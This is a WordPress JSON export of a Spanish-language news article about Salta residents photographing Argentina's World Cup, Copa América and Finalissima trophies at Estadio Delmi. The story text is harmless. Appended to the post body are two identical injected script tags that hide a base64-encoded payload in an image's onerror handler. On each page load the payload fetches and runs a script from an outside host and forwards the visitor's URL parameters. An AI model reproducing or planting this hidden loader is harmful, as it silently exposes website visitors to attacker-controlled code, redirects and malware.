{"id":3933,"date":"2024-04-17T09:57:55","date_gmt":"2024-04-17T12:57:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3933"},"modified":"2025-08-13T23:57:00","modified_gmt":"2025-08-14T02:57:00","slug":"miles-de-saltenos-obtuvieron-su-foto-con-la-copa-del-mundo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3933","title":{"rendered":"Miles de salte\u00f1os obtuvieron su foto con la Copa del Mundo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a140c3a9085f20032f243e9ac819c5bd\" style=\"background-color:#085481\"><em>Hinchas de todas las edades se hicieron presentes en el Estadio Delmi para llevarse el recuerdo de una foto con la Copa del Mundo, la Copa Am\u00e9rica y la Copa Finalissima.<\/em><\/h4>\n\n\n\n<p>Con una fila permanente en el Estadio Delmi, familias, grupos de amigos y amigas pudieron fotografiarse con la Copa del Mundo de Qatar 2022, la Copa Am\u00e9rica 2021 y la Copa Finalissima 2022, que llegaron a la capital salte\u00f1a como resultado de gestiones iniciadas por el gobernador<strong>&nbsp;Gustavo S\u00e1enz&nbsp;<\/strong>y un trabajo conjunto entre el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;junto al Consejo Federal de F\u00fatbol.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"3935\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6488-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-1024x576.jpg\" alt=\"\" class=\"wp-image-3935\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6488-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6488-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6488-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6488-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6488-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6488-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"3936\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6489-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-1024x576.jpg\" alt=\"\" class=\"wp-image-3936\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6489-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6489-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6489-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6489-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6489-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6489-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"3937\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6491-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-1024x576.jpg\" alt=\"\" class=\"wp-image-3937\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6491-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6491-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6491-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6491-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6491-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/6491-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u201cElegimos por decisi\u00f3n del Gobernador que en el cumplea\u00f1os de la ciudad de Salta, la Copa Am\u00e9rica, La Final\u00edsima y la gran Copa del Mundo est\u00e9n en Salta; es un gran orgullo poder tenerlas en nuestra Provincia porque adem\u00e1s de que el 18 de diciembre de 2022 fue un momento hist\u00f3rico para Argentina tambi\u00e9n significa un gran ejemplo de ese trabajo en equipo, de ese esfuerzo y de lo que se puede lograr si trabajamos todos juntos\u201d, manifest\u00f3 el ministro Pe\u00f1a en el inicio de la jornada.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11675-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11675-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo.JPG\" alt=\"Miles de salte\u00f1os obtuvieron su foto con la Copa del Mundo\" style=\"width:366px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Asimismo, el delegado en Salta del Consejo Federal&nbsp;<strong>Osvaldo Romano<\/strong>&nbsp;agradeci\u00f3 \u201cal Gobierno de la Provincia la posibilidad de tener hoy las copas en Salta, es un hecho hist\u00f3rico dentro de lo que es el deporte de nuestro pa\u00eds, el deporte m\u00e1s popular que genera pasi\u00f3n en todos los argentinos\u201d.<\/p>\n\n\n\n<p>Vale destacar que este evento trasciende lo meramente deportivo, se trata de un encuentro con la historia, con los recuerdos imborrables de momentos de gloria que han marcado a toda la Argentina. Es una oportunidad para recordar con orgullo los logros de los h\u00e9roes futbol\u00edsticos de miles de ni\u00f1os, ni\u00f1as y adolescentes.<\/p>\n\n\n\n<p>Alumnos y alumnas de distintas instituciones educativas pudieron participar de esta jornada y llevarse ese recuerdo de poder tocar las copas y sacarse una foto con ellas. \u201cEs hermoso poder tener la oportunidad de tener la copa en Salta, estamos muy felices, queremos llorar la emoci\u00f3n\u201c, manifestaron.<\/p>\n\n\n\n<p>El acto de apertura estuvo encabezado tambi\u00e9n por el ministro de Seguridad y Justicia,&nbsp;<strong>Marcelo Dom\u00ednguez<\/strong>&nbsp;junto a intendentes, legisladores provinciales y presidentes de las distintas c\u00e1maras del sector privado de la Provincia.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11676-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11676-miles-de-saltenios-obtuvieron-su-foto-con-la-copa-del-mundo.JPG\" alt=\"Miles de salte\u00f1os obtuvieron su foto con la Copa del Mundo\"\/><\/a><\/figure><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hinchas de todas las edades se hicieron presentes en el Estadio Delmi para llevarse el recuerdo de una foto con la Copa del Mundo, la Copa Am\u00e9rica y la Copa Finalissima. Con una fila permanente en el Estadio Delmi, familias, grupos de amigos y amigas pudieron fotografiarse con la Copa del Mundo de Qatar 2022, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3934,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,17],"tags":[],"class_list":{"0":"post-3933","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3933"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3933"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3933\/revisions"}],"predecessor-version":[{"id":6801,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3933\/revisions\/6801"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3934"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}